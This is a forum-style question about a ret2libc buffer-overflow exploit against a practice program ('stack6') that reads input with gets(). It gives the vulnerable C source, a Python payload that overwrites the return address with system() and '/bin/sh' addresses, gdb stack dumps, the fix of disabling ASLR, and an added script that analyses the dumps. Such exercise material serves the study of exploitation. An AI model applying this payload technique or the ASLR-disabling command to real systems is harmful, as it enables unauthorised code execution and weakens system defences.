I am trying to execute a ret2libc attack. For this, I need to call system() from libc and pass it the argument "/bin/sh" (the address of "/bin/sh"). Unfortunately I get a "Segmentation fault" every time.
Can anybody please tell me why? If I look at the stack, everything looks fine (to me).
This is my Source Code:
#include <stdio.h>
#include <unistd.h>   /* _exit() */

void getpath()
{
    char buffer[64];          /* 64-byte stack buffer, filled by gets() with no length bound */
    unsigned int ret;
    printf("input path please: "); fflush(stdout);
    gets(buffer);
    ret = __builtin_return_address(0);   /* only the low 32 bits of the saved return address are kept */
    if((ret & 0xbf000000) == 0xbf000000) {
        printf("bzzzt (%p)\n", ret);
        _exit(1);
    }
    printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
    getpath();
    return 0;
}
My exploit code is as follows:
import struct

# Python 2 script: struct.pack() returns a str here, so the pieces concatenate directly.
offset = "A"*88                                   # filler from the start of buffer up to the saved return address
system_adress = struct.pack("q",0x7ffff7a60510)   # address of system() in libc, 8 bytes little-endian
nop = "\x90"*4
bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)   # address of the "/bin/sh" string in libc
#libc_start = 0x7ffff7a1e000
#sh_offset = 0x17d3f3
#libc_start plus sh_Offset = 0x7ffff7b9b3f3
print(offset + system_adress + nop + bin_sh_adress)
Here are my terminal commands:
>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text
Breakpoint 2, getpath () at stack6.c:11
11 printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000 0x00000000 0x00f0b2ff 0x00000000
0x7fffffffe170: 0x000000c2 0x00000000 0xffffe1a6 0x00007fff
0x7fffffffe180: 0x00000001 0x00000000 0xf7abe905 0x00007fff
0x7fffffffe190: 0x00000001 0x00000000 0x5555485d 0x00005555
0x7fffffffe1a0: 0xf7de70e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe1b0: 0xffffe1d0 0x00007fff 0x555547fd 0x00005555
0x7fffffffe1c0: 0xffffe2b8 0x00007fff 0x00000000 0x00000001
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
input path please: 13 gets(buffer);
>>> n
Breakpoint 1, getpath () at stack6.c:15
15 ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0xf7a60510 0x00007fff
0x7fffffffe1c0: 0x90909090 0xf7b9b3f3 0x00007fff 0x00000000
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
17 if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22 printf("got path %s\n", buffer);
>>>
Error report:
root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault
Problem fixed:
ASLR was not disabled -> Disabling ASLR: echo 0 > /proc/sys/kernel/randomize_va_space
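Added example, not part of the question or its answer: a Python 3 script that parses the two `x/40xw $rsp` dumps copied from the gdb session above, reassembles each pair of 32-bit words into the 64-bit little-endian value the CPU actually loads from the saved-rbp and return-address slots (rbp and rbp+8, using the rbp value 0x7fffffffe1b0 from the `i r rsp rbp` output), and lists which slots changed between the dump before and after gets(). The region labels are my own heuristic based on the address prefixes seen in these dumps (0x7fff…, 0x5555…, 0x4141…), not anything gdb reports, and the function names are mine.

```python
import re
import struct

# Both dumps are copied from the gdb session in the question (x/40xw $rsp,
# before and after gets()). RBP_VALUE is the rbp shown by 'i r rsp rbp'.
RBP_VALUE = 0x7fffffffe1b0

DUMP_BEFORE = """\
0x7fffffffe160: 0x00000000 0x00000000 0x00f0b2ff 0x00000000
0x7fffffffe170: 0x000000c2 0x00000000 0xffffe1a6 0x00007fff
0x7fffffffe180: 0x00000001 0x00000000 0xf7abe905 0x00007fff
0x7fffffffe190: 0x00000001 0x00000000 0x5555485d 0x00005555
0x7fffffffe1a0: 0xf7de70e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe1b0: 0xffffe1d0 0x00007fff 0x555547fd 0x00005555
0x7fffffffe1c0: 0xffffe2b8 0x00007fff 0x00000000 0x00000001
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
"""

DUMP_AFTER = """\
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0xf7a60510 0x00007fff
0x7fffffffe1c0: 0x90909090 0xf7b9b3f3 0x00007fff 0x00000000
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
"""

# One gdb 'x/Nxw' line: "<addr>: <word> <word> ..."
LINE_RE = re.compile(r"\s*(0x[0-9a-fA-F]+):((?:\s+0x[0-9a-fA-F]{8})+)\s*$")


def parse_xw_dump(text):
    """Map each 4-byte-aligned address to its 32-bit word from gdb 'x/Nxw' output."""
    words = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        base = int(m.group(1), 16)
        for i, w in enumerate(m.group(2).split()):
            words[base + 4 * i] = int(w, 16)
    return words


def qword_at(words, addr):
    """Reassemble the two little-endian 32-bit words at addr into the 64-bit
    value the CPU loads from that slot (gdb prints the low word first)."""
    raw = struct.pack("<II", words[addr], words[addr + 4])
    return struct.unpack("<Q", raw)[0]


def region(value):
    """Heuristic label for a 64-bit value, based only on the address prefixes
    that appear in these dumps (my own classification, not gdb's)."""
    if value == 0x4141414141414141:
        return "input filler (0x41 = 'A')"
    top = value >> 32
    if top == 0x7FFF:
        return "mmap region (stack or shared library)"
    if top == 0x5555:
        return "PIE executable"
    return "not a mapped-looking address"


def frame_slots(text, rbp=RBP_VALUE):
    """Return the 64-bit values in the saved-rbp slot, the return-address slot
    and the two qwords above them, each paired with its region label."""
    words = parse_xw_dump(text)
    names = ["saved_rbp", "return_address", "rbp+16", "rbp+24"]
    out = {}
    for i, name in enumerate(names):
        value = qword_at(words, rbp + 8 * i)
        out[name] = (value, region(value))
    return out


def changed_slots(before_text, after_text, rbp=RBP_VALUE):
    """List the frame slots whose 64-bit value differs between the two dumps."""
    before = frame_slots(before_text, rbp)
    after = frame_slots(after_text, rbp)
    return [name for name in before if before[name][0] != after[name][0]]


if __name__ == "__main__":
    for label, dump in (("before gets()", DUMP_BEFORE), ("after gets()", DUMP_AFTER)):
        print(label)
        for name, (value, where) in frame_slots(dump).items():
            print(f"  {name:<15} {value:#018x}  {where}")
    print("overwritten:", changed_slots(DUMP_BEFORE, DUMP_AFTER))
```

Running it prints both frames side by side; the "overwritten" list is the forensic summary of the session (every slot from the saved rbp upward was replaced by the input), and the region label shows at a glance which 64-bit slots hold something shaped like a libc or binary pointer and which do not, which is the check worth doing before concluding that "the stack looks fine" from a column of 32-bit words.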